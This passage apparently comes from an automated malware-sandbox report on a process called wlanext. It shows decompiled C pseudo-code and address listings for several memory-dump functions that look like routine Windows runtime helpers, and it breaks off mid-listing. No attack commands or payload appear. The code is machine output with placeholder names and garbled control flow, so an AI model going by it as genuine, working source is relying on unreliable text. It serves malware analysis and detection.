                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ef2c133afb8b7d6f4cfe007e465c98cb127e3f3d2d7aa3e8ee39d9fe99fd8a3d
                                  • Instruction ID: 9bf552cca26dfbe5f0ffbe19bf70b863c27650b73ba72382aa1e9608ef440754
                                  • Opcode Fuzzy Hash: ef2c133afb8b7d6f4cfe007e465c98cb127e3f3d2d7aa3e8ee39d9fe99fd8a3d
                                  • Instruction Fuzzy Hash: 6D312276A016069FDB21EF98E480BA673B4FF08310F4504B9ED44DF225E734DA6ACB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034E9100 Relevance: .1, Instructions: 87COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 76%
                                  			E034E9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x35bf6e8);
				E0353D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E035B88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0353D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x35d86c0; // 0xb407b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x35d86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E03502280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E035B88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0352AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x35db1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x35d84c0;
										if(_t69 >=  *0x35d84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E035B9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E034E922A(_t82);
							_t53 = E03507D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E035B8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x35d86c0; // 0xb407b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x35d86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x35d86bc;
										_t72 = 0x35d86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E034E9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x35d86c4;
									_t72 = 0x35d86c0;
									L18:
									E03519B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                  0x034e9100
                                  0x034e9100
                                  0x034e9100
                                  0x034e9100
                                  0x034e9102
                                  0x034e9107
                                  0x034e910c
                                  0x034e9110
                                  0x034e9115
                                  0x034e9136
                                  0x034e9143
                                  0x035437e4
                                  0x035437e4
                                  0x034e9149
                                  0x034e914e
                                  0x034e914e
                                  0x034e9117
                                  0x034e911d
                                  0x00000000
                                  0x00000000
                                  0x034e911f
                                  0x034e9125
                                  0x00000000
                                  0x034e9151
                                  0x034e9158
                                  0x034e915d
                                  0x034e9161
                                  0x034e9168
                                  0x03543715
                                  0x00000000
                                  0x034e916e
                                  0x034e916e
                                  0x034e9175
                                  0x034e9177
                                  0x034e917e
                                  0x034e917f
                                  0x034e9182
                                  0x034e9182
                                  0x034e9187
                                  0x034e9187
                                  0x034e918a
                                  0x034e918d
                                  0x034e918f
                                  0x034e9192
                                  0x034e9195
                                  0x034e9198
                                  0x034e9198
                                  0x034e9198
                                  0x034e919a
                                  0x00000000
                                  0x00000000
                                  0x0354371f
                                  0x03543721
                                  0x03543727
                                  0x0354372f
                                  0x03543733
                                  0x03543735
                                  0x03543738
                                  0x0354373b
                                  0x0354373d
                                  0x03543740
                                  0x00000000
                                  0x00000000
                                  0x03543746
                                  0x03543749
                                  0x00000000
                                  0x00000000
                                  0x0354374f
                                  0x03543751
                                  0x00000000
                                  0x00000000
                                  0x03543757
                                  0x03543759
                                  0x0354375c
                                  0x0354375c
                                  0x0354375e
                                  0x0354375e
                                  0x03543761
                                  0x03543764
                                  0x00000000
                                  0x00000000
                                  0x03543766
                                  0x03543768
                                  0x035437a3
                                  0x035437a3
                                  0x035437a5
                                  0x035437a7
                                  0x035437ad
                                  0x035437b0
                                  0x035437b2
                                  0x035437bc
                                  0x035437c2
                                  0x035437c2
                                  0x035437b2
                                  0x034e9187
                                  0x034e9187
                                  0x034e918a
                                  0x034e918d
                                  0x034e918f
                                  0x034e9192
                                  0x034e9195
                                  0x00000000
                                  0x034e9195
                                  0x00000000
                                  0x034e9187
                                  0x0354376a
                                  0x0354376a
                                  0x0354376c
                                  0x0354376c
                                  0x0354376f
                                  0x03543775
                                  0x00000000
                                  0x00000000
                                  0x03543777
                                  0x03543779
                                  0x00000000
                                  0x00000000
                                  0x03543782
                                  0x03543787
                                  0x03543789
                                  0x03543790
                                  0x03543790
                                  0x0354378b
                                  0x0354378b
                                  0x0354378b
                                  0x03543792
                                  0x03543795
                                  0x03543795
                                  0x03543798
                                  0x03543798
                                  0x0354379b
                                  0x0354379b
                                  0x034e91a3
                                  0x034e91a9
                                  0x034e91b0
                                  0x034e91b4
                                  0x034e91b4
                                  0x034e91bb
                                  0x034e91c0
                                  0x034e91c5
                                  0x034e91c7
                                  0x035437da
                                  0x034e91cd
                                  0x034e91cd
                                  0x034e91cd
                                  0x034e91d2
                                  0x034e91d5
                                  0x034e9239
                                  0x034e9239
                                  0x034e91d7
                                  0x034e91db
                                  0x034e91e1
                                  0x034e91e7
                                  0x034e91fd
                                  0x034e9203
                                  0x034e921e
                                  0x034e9223
                                  0x00000000
                                  0x034e9223
                                  0x034e9205
                                  0x034e9208
                                  0x034e920c
                                  0x034e9214
                                  0x034e9214
                                  0x034e91e9
                                  0x034e91e9
                                  0x034e91ee
                                  0x034e91f3
                                  0x034e91f3
                                  0x034e91f3
                                  0x034e91e7
                                  0x00000000
                                  0x034e91db
                                  0x034e9187
                                  0x034e9168

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bdbaa05f771f137539d5362b48c220d54e0fd79de8b32917d2491979d6ce1202
                                  • Instruction ID: 983a878cd7f23d2204c4cb852abf6fc52a3479fa9f456d8dff8a02c619cd71ed
                                  • Opcode Fuzzy Hash: bdbaa05f771f137539d5362b48c220d54e0fd79de8b32917d2491979d6ce1202
                                  • Instruction Fuzzy Hash: EB31C479A01345DFEB25DF68D048BADF7B1BB88315F1C814AC4146B3A1C338A940CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03511DB5 Relevance: .1, Instructions: 87COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 60%
                                  			E03511DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0350F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L03504620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0350F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                  0x03511dc2
                                  0x03511dc5
                                  0x03511dc7
                                  0x03511dcc
                                  0x03511dce
                                  0x03511dd6
                                  0x03511ddf
                                  0x03511de0
                                  0x03511de1
                                  0x03511de5
                                  0x03511de8
                                  0x03511def
                                  0x03511df0
                                  0x03511df6
                                  0x03511df7
                                  0x03511dfe
                                  0x03511e1a
                                  0x00000000
                                  0x00000000
                                  0x03511e0b
                                  0x03511e12
                                  0x03511e12
                                  0x03511e00
                                  0x03511e00
                                  0x03511e05
                                  0x03511e1e
                                  0x03511e23
                                  0x0355570f
                                  0x03555713
                                  0x00000000
                                  0x00000000
                                  0x03555719
                                  0x03555719
                                  0x03511e2c
                                  0x03511e2d
                                  0x03511e2e
                                  0x03511e2f
                                  0x03511e31
                                  0x03511e32
                                  0x03511e35
                                  0x03511e3d
                                  0x03555723
                                  0x0355573d
                                  0x0355573d
                                  0x00000000
                                  0x03555723
                                  0x03511e49
                                  0x03511e4e
                                  0x03511e4e
                                  0x03511e09
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                  • Instruction ID: 65311054f78008da5ab2910aac2b6fff3e66e9dad184ea6ce9e74a426eb24fe7
                                  • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                  • Instruction Fuzzy Hash: 2821A375600619EFD720CF99EC80E6BFBBDFF85680F154595FA019B260D630AE11C790
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03500050 Relevance: .1, Instructions: 81COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 53%
                                  			E03500050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x35dd360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E03519ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0352B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E035B8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E03519702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x35db1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                  0x03500055
                                  0x0350005d
                                  0x03500062
                                  0x0350006c
                                  0x0350006f
                                  0x03500074
                                  0x0350007a
                                  0x0350007a
                                  0x03500080
                                  0x03500080
                                  0x03500087
                                  0x0350008d
                                  0x0350008f
                                  0x03500093
                                  0x03500095
                                  0x0350009b
                                  0x035000f8
                                  0x035000fb
                                  0x035000fc
                                  0x035000ff
                                  0x03500108
                                  0x03500108
                                  0x035000a2
                                  0x035000a6
                                  0x035000b3
                                  0x035000bc
                                  0x035000c5
                                  0x035000ca
                                  0x0354c01e
                                  0x00000000
                                  0x00000000
                                  0x0354c02d
                                  0x035000d5
                                  0x035000d9
                                  0x0354c03d
                                  0x0354c046
                                  0x0354c046
                                  0x035000df
                                  0x035000e2
                                  0x035000ea
                                  0x035000ef
                                  0x035000f2
                                  0x035000f6
                                  0x03500111
                                  0x03500117
                                  0x03500117
                                  0x00000000
                                  0x035000f6
                                  0x035000d0
                                  0x035000d0
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b6f0ed2cc00aba6a95ef89268914ca3899a285d96f4b55eaaa58a7c958080c39
                                  • Instruction ID: d1b81b8f5d601231d3d766e677691099109973234e510b512353d72ce921446f
                                  • Opcode Fuzzy Hash: b6f0ed2cc00aba6a95ef89268914ca3899a285d96f4b55eaaa58a7c958080c39
                                  • Instruction Fuzzy Hash: 0031C135201B05CFD725CF28D950B9AB3F5FF89714F18456DE49A87BA0DB32A802CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03566C0A Relevance: .1, Instructions: 79COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 77%
                                  			E03566C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E03507D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x35d7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L03504620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0352F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E03507D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E03529AE0();
						_t23 = L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                  0x03566c0a
                                  0x03566c0f
                                  0x03566c10
                                  0x03566c13
                                  0x03566c15
                                  0x03566c19
                                  0x03566c1c
                                  0x03566c21
                                  0x03566c28
                                  0x03566c3a
                                  0x03566c2a
                                  0x03566c33
                                  0x03566c33
                                  0x03566c3f
                                  0x03566c48
                                  0x03566c4d
                                  0x03566c60
                                  0x03566c65
                                  0x03566c69
                                  0x03566c73
                                  0x03566c79
                                  0x03566c7f
                                  0x03566c86
                                  0x03566c90
                                  0x03566c94
                                  0x03566ca6
                                  0x03566cb2
                                  0x03566cbd
                                  0x03566cbd
                                  0x03566cc3
                                  0x03566cc7
                                  0x03566ccb
                                  0x03566cd0
                                  0x03566cd1
                                  0x03566ce2
                                  0x03566ce2
                                  0x03566c69
                                  0x03566ced

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 23804b9c50aa26ee68e79ebd10bd3660f52bfef9c145d25b2a81113264fa9d93
                                  • Instruction ID: d2fe3fb4c2e2cea0762c4df65ab218641a6d1abb570bb11f90bc28dae0f6d593
                                  • Opcode Fuzzy Hash: 23804b9c50aa26ee68e79ebd10bd3660f52bfef9c145d25b2a81113264fa9d93
                                  • Instruction Fuzzy Hash: 5921ABB5A00A45AFD711DF68E880E2AB7B8FF88740F040069F904DB7A1E735ED10CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035290AF Relevance: .1, Instructions: 76COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E035290AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0353D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0351E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L03504620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0352F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0351A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                  0x035290af
                                  0x035290b8
                                  0x035290bb
                                  0x035290bf
                                  0x035290c2
                                  0x035290c2
                                  0x035290c8
                                  0x035290cb
                                  0x035290cd
                                  0x035614d7
                                  0x035614eb
                                  0x035614eb
                                  0x00000000
                                  0x035614eb
                                  0x035614db
                                  0x035614e6
                                  0x00000000
                                  0x035614f2
                                  0x035614e8
                                  0x00000000
                                  0x035614e8
                                  0x035290d8
                                  0x035290da
                                  0x035290dd
                                  0x035290e5
                                  0x00000000
                                  0x03529139
                                  0x035290fa
                                  0x035290fe
                                  0x03529142
                                  0x00000000
                                  0x03529142
                                  0x03529104
                                  0x03529107
                                  0x0352910b
                                  0x03529110
                                  0x03529118
                                  0x03529147
                                  0x03529148
                                  0x0352914f
                                  0x03529150
                                  0x03529151
                                  0x03529152
                                  0x03529156
                                  0x0352915d
                                  0x03529160
                                  0x03529168
                                  0x0352916c
                                  0x035291bc
                                  0x035291be
                                  0x00000000
                                  0x035291be
                                  0x0352916e
                                  0x03529173
                                  0x03529176
                                  0x00000000
                                  0x00000000
                                  0x0352917c
                                  0x03529180
                                  0x035291b5
                                  0x00000000
                                  0x035291b5
                                  0x03529182
                                  0x03529185
                                  0x03529189
                                  0x00000000
                                  0x00000000
                                  0x0352918e
                                  0x03529190
                                  0x03529198
                                  0x00000000
                                  0x00000000
                                  0x035291a0
                                  0x00000000
                                  0x035291ad
                                  0x035291ad
                                  0x035291b0
                                  0x035291b1
                                  0x00000000
                                  0x03529185
                                  0x0352911a
                                  0x0352911c
                                  0x0352911f
                                  0x03529125
                                  0x03529127
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                  • Instruction ID: a5b7dcb26d72255b91fdbc64fac1f8a1191081bcfff52dee7d72ea4c559e0c42
                                  • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                  • Instruction Fuzzy Hash: 25217F75A00755EFDB20DF59E844E6AFBF8FB44350F15886AE945AB360D330A950CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03513B7A Relevance: .1, Instructions: 75COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 59%
                                  			E03513B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x35d84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x35d84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L03504620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x35d84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0352AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0352FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x35d84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x35d84c4; // 0x0
					L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                  0x03513b89
                                  0x03513b96
                                  0x03513ba1
